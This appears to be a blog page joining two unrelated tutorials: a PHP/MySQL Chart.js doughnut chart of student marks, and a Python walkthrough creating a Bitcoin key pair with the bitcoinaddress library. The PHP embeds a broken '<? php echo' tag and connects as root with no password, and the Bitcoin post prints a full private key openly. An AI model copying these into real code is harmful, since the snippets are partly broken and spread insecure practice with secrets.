    The below figure shows the output of this Chart JS doughnut example.

    Doughnut Chart with PHP and MySQL Database

    This example will be helpful if you want to display dynamic data from an external source.

    It uses a database source to supply data for the Chart JS doughnut chart.

    The db_chartjs_data is the database that contains the tbl_marks table. It has student’s mark in percentage.

    The doughnut chart should display the number of students who got a particular percentage.

    doughnut-chart-with-php-database.php

    <?php
    $conn = new mysqli('localhost', 'root', '', 'db_chartjs_data');
    $sql = "SELECT count(*) as marks_percentage_count, percentage FROM tbl_marks GROUP BY percentage";
    $result = $conn->query($sql);
    { $label = array(); $percentage = array(); while ($row = $result->fetch_assoc()) { $label[] = $row["percentage"] . "%"; $percentage[] = $row["marks_percentage_count"]; }
    }
    $chartLabel = json_encode($label);
    $chartData = json_encode($percentage);
    ?>
    <!DOCTYPE html>
    <html>
    <head>
    <title>Doughnut Chart with PHP and MySQL Database</title>
    <link rel='stylesheet' href='style.css' type='text/css' />
    </head> <body> <div class="phppot-container"> <h1>Doughnut Chart with PHP and MySQL Database</h1> <div> <canvas id="chartjs-doughnut"></canvas> </div> </div> <script src="https://cdn.jsdelivr.net/npm/chart.js@4.0.1/dist/chart.umd.min.js"></script> <script> new Chart(document.getElementById("chartjs-doughnut"), { type: 'doughnut', data: { labels: <? php echo $chartLabel; ?>, datasets: [{ backgroundColor: ["#51EAEA", "#FCDDB0", "#FF9D76", "#FB3569", "#82CD47"], data: <? php echo $chartData; ?> }] }, options: { title: { display: true, text: 'Chart JS Doughnut' }, cutout: '60%', // the portion of the doughnut that is cutout in the middle radius: 200 } }); </script>
    </body>
    </html>
    

    This is the database script to import before running this example.

    db_chartjs_data.sql

    --
    -- Database: `db_chartjs_data`
    -- --
    -- Table structure for table `tbl_marks`
    -- CREATE TABLE `tbl_marks` ( `id` int(11) NOT NULL, `name` varchar(55) NOT NULL, `percentage` int(11) NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; --
    -- Dumping data for table `tbl_marks`
    -- INSERT INTO `tbl_marks` (`id`, `name`, `percentage`) VALUES
    (1, 'John', 85),
    (2, 'Matthew', 85),
    (3, 'Tim', 65),
    (4, 'Clare', 75),
    (5, 'Viola', 85),
    (6, 'Vinolia', 75),
    (7, 'Laura', 85),
    (8, 'Leena', 75),
    (9, 'Evan', 85),
    (10, 'Ellen', 90); --
    -- Indexes for table `tbl_marks`
    --
    ALTER TABLE `tbl_marks` ADD PRIMARY KEY (`id`); --
    -- AUTO_INCREMENT for dumped tables
    -- --
    -- AUTO_INCREMENT for table `tbl_marks`
    --
    ALTER TABLE `tbl_marks` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;
    

    This code prepares a query to fetch the student’s count grouped by percentage. There are four distinct percentages in the database.

    This output screenshot displays the number of students who scored a particular percentage.

    Output

    dynamic doughnut chart

    The ChartJS script to display a doughnut chart requires additional (optional) property. That is, the cutout property specified under the ChartJS options array.

    It accepts value in percentage. It decides the transparent area cutout from the middle of the doughnut chart.

    Download

    ↑ Back to Top

    Posted on Leave a comment

    I Used These 3 Easy Steps to Create a Bitcoin Wallet in Python (Public/Private)

    5/5 – (1 vote)

    As I write this, Bitcoin is in a deep bear market. That’s the perfect time to learn about the tech and start building!

    After listening to a podcast from Lyn Alden today, I wondered if it is possible to programmatically create a Bitcoin wallet, i.e., a public/private key pair.

    This can be extremely useful in practice, not only if you want to create an application that uses the “decentralized money layer” to transfer value between two parties in a fully automatic way, but also if you want to quickly create a public/private key pair to send and receive BTC without trusting a third party.

    You may not trust that wallet provider after all. It is in the nature of the Bitcoin protocol that if you desperately need it, you’ll need it quickly and without lots of trust assumptions. So better be prepared!

    In this project, we’ll answer the following interesting question.

    🪙 Project: How to create a Bitcoin wallet in Python (public/private key pair)?

    Step 1: Install Library

    Use PIP to install the bitcoinaddress library in your actual or virtual environment.

    🔐 Is It Safe? I investigated the library code from the GitHub repository associated with this library, and I couldn’t find any trust issues. Specifically, I searched for “hacks” in the code, such as sending the public/private key pair to a remote server, but the repository seems to be clean. It is also well-respected in the community, so unlikely to be tampered with. I didn’t check if the public/private key pairs have maximum entropy, i.e., are truly randomly created with all private keys having the same likelihood. I cannot guarantee that this is 100% safe because I don’t know the owner of the library — but it looks safe at first and second glance.

    To install the library, here are three of the most common ways:

    👉 Python 3
    pip3 install bitcoinaddress 👉 Standard Python and Python 2 Installation
    pip install bitcoinaddress 👉 Jupyter Notebook Cell
    !pip install bitcoinaddress

    Here’s what this looks like in my Jupyter Notebook:

    🌍 Recommended: 5 Steps to Install a Python Library

    Step 2: Import and Create Wallet

    The Wallet class from the bitcoinaddress module allows you to easily create a new and random public/private keypair using the Wallet() constructor method, i.e., all you need to create a new random Bitcoin wallet.

    from bitcoinaddress import Wallet
    wallet = Wallet()

    Stay with me. You’re almost done! 💪

    Step 3: Print Wallet

    Next, print the content of the newly created wallet. This contains all the information you need about the public and private keys and addresses.

    print(wallet)

    In the following output, I bolded the two relevant lines with the public address and the private key:

    Private Key HEX: 6b789bec69f7f90c2ed73c8ee58f1f899b42fde5641359f6b76a27b4406399f7
    Private Key WIF: 5JdcnccAMqs1t38VTPyeGHgBQ7KaYGueSqUAmLBTzVqFzh4ssUN
    Private Key WIF compressed: KzpcxLACJzfktGQ4bWR1UUbvtzu133DNH2vv6ffC8nG1BFSUFBfr Public Key: 0415d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be997d31989f6dcca716db63898c739621a86aa4a7bbe74c8936a6f1bbc7937c5c0 Public Key compressed: 0215d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be9 Public Address 1: 14XyDoAgdGF7xiCrgux5Bd7P993PnXALuW 
    Public Address 1 compressed: 1LW26DRtBraVQ5ec7J5D3uQsM3AD3oVHXx Public Address 3: 32iX1WnnMkLQLc6beTQ6no5H4J6arvUeBP Public Address bc1 P2WPKH: bc1q6hn4e55vfh6ka0z88tpr2jmqze8w4j84axsjh4 Public Address bc1 P2WSH: bc1qhff5zxmy7rs5mvx037ztg95nnnqe97fet66l65xgsafv89tmz8xssm8tph 

    The output of the bitcoinaddress.Wallet() method provides the details of a new bitcoin wallet.

    It includes the private key in both HEX and Wallet Import Format (WIF) formats, as well as the compressed version of the WIF.

    It also provides the public key, both in uncompressed and compressed formats, as well as three different public addresses generated from the public key.

    I actually checked the address on a Blockchain explorer, and it’s the correct one:

    I also checked if the public and private addresses match and they seem to do:

    Additionally, it provides 2 SegWit addresses generated from the public key; one in Pay-to-Witness-Public-Key-Hash (P2WPKH) format and one in Pay-to-Witness-Script-Hash (P2WSH) format.